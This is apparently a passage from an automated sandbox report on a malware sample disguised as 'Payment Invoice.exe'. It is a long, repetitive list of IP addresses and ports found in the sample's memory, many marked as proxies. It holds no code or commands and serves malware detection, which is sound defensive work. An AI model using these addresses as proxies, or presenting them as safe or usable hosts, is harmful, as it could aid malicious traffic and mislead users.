                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.232.172:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.146.14:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.146.14:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.151.165:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.151.165:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.82.233:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.82.233:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.20.217.178:90910q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.20.217.178:9091://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.221.3.8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.221.3.86:5566
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.221.3.86:5566://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.191:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.191:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.42:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.42:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.135:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.135:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.59.4.88:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.59.4.88:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.8.155.54:7777
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.8.155.54:7777://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.92.164.242:52347
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.92.164.242:52347://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E03000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631986F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.197.3.200:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.197.3.200:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.30.155.83:12792
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.30.155.83:12792://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.164.248:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.164.248:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.170.250:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.170.250:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.47.188
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.47.188://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.47.188:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B43000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.98.218.73:57658
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.98.218.73:57658://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.100.209.184:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.100.209.184:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.101.255.100
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.101.255.100:38801
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.101.255.100:38801://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.121.240.114:3256
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.121.240.114:3256://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.247.27:19132
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.247.27:19132://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.195.224.222:9999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.195.224.222:9999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.223.214.1:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.223.214.1:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.223.215.71:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.223.215.71:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.53.3.242:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.53.3.242:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163173A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.132.202.78:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.141.61.2:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.141.61.2:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.156.77.107:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.156.77.107:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.219.104.31:10001
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.219.104.31:10001://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.41.72:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.41.72:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.42.41:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.42.41:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.45.101:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.45.101:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.45.81:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.45.81:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.109.43:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.109.43:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.110.28:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.110.28:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318216000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631821F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.255.132.60:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631821F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.255.132.60:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.10.131:8004
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.10.131:8004://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.12.249:8004
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.12.249:8004://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.13.192:8004
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.13.192:8004://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163173E3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.2.66:8004
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.2.66:8004://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.112.74:8090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.112.74:8090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.13.154:8880
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.13.154:8880://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.28.10:8674
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.28.10:8674://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.31.66:8080://proxy0q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.35.177:1088://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.221.242.131:9999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.221.242.131:9999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.240.163.31
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.240.163.31://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.240.163.31:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631849F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631848A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.243.142.185:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631849F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.243.142.185:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.162
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.162://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.162:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.248.66.131:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.248.66.131:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.42.45.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.42.45.1://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.42.45.1:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.75.160.196:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.75.160.196:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.76.192.45:5303
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.76.192.45:5303://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.84.248.140:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.84.248.140:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.96.208.124:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.96.208.124:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.106.105.55:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.106.105.55:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317CED000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.48.208:35050
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.48.208:35050://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.21:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.21:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.25:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.25:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.199.168.1:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.199.168.1:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.242.89.230:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.242.89.230:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.5.187.116:7890
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.5.187.116:7890://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.50.174.181:17066
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.50.174.181:17066://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.62.147.249:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.62.147.249:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.9.163.205:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.9.163.205:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.97.240.147:4995
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.97.240.147:4995://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.99.237.142:5311
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.99.237.142:5311://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.99.237.203:5304
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130:8899
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631997A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130:8899://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.133://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134:8899
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134:8899://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:82
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:82://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163173D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:9990
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163173D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:9990://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.20.56.203:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.20.56.203:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.202.20.69:1088
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.202.20.69:1088://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.235:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.235:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.27:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.27:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.117.190.148:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.117.190.148:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.230.19:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.230.19:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.222.104.135
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.222.104.135://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.222.104.135:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.66.50:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.66.50:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.99.233:5678
